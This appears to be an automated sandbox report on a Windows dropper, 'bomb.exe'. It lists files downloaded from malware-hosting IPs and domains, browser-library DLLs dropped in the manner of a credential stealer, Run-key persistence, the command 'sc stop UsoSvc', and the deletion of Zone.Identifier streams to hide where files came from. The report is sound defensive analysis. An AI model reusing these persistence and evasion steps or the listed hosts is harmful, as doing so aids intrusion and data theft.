Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041DED5 push ecx; ret	8_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00432715 push 0000004Ch; iretd	8_2_00432726

Source: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.0.dr	Static PE information: section name: .text entropy: 7.990163205284918
Source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe.0.dr	Static PE information: section name: .text entropy: 6.9348009258285686

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\400445\Batch.pif

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Executable created and started: C:\Windows\sysvplervcs.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	File created: C:\Windows\sysvplervcs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\http77.105.161.194filecarrier_ratecon.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\GHJDBAKEHD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Jump to dropped file
Source: C:\Users\user\sysvplervcs.exe	File created: C:\Users\user\AppData\Local\Temp\454830019.exe	Jump to dropped file
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\sysvplervcs.exe	File created: C:\Users\user\AppData\Local\Temp\1534331641.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	File created: C:\Users\user\sysvplervcs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe	Jump to dropped file
Source: C:\Users\user\sysvplervcs.exe	File created: C:\Users\user\AppData\Local\Temp\1037419404.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	File created: C:\Users\user\AppData\Local\Temp\323057790.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sql[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\http77.105.161.194pdffile.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	File created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\GHJDBAKEHD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\323057790.exe

File created: C:\Users\user\sysvplervcs.exe

Jump to dropped file

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

File created: C:\Windows\sysvplervcs.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Local\Temp\323057790.exe

File created: C:\Users\user\sysvplervcs.exe

Jump to dropped file

Source: C:\Users\user\sysvplervcs.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	File opened: C:\Users\user\AppData\Local\Temp\323057790.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	File opened: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	File opened: C:\Users\user\AppData\Local\Temp\323057790.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\sysvplervcs.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\222121568.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\294195850.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\454830019.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\1534331641.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\24476670.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\1007912056.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysvplervcs.exe	File opened: C:\Users\user\AppData\Local\Temp\1037419404.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

8_2_00418A63

Source: C:\Users\user\Desktop\bomb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
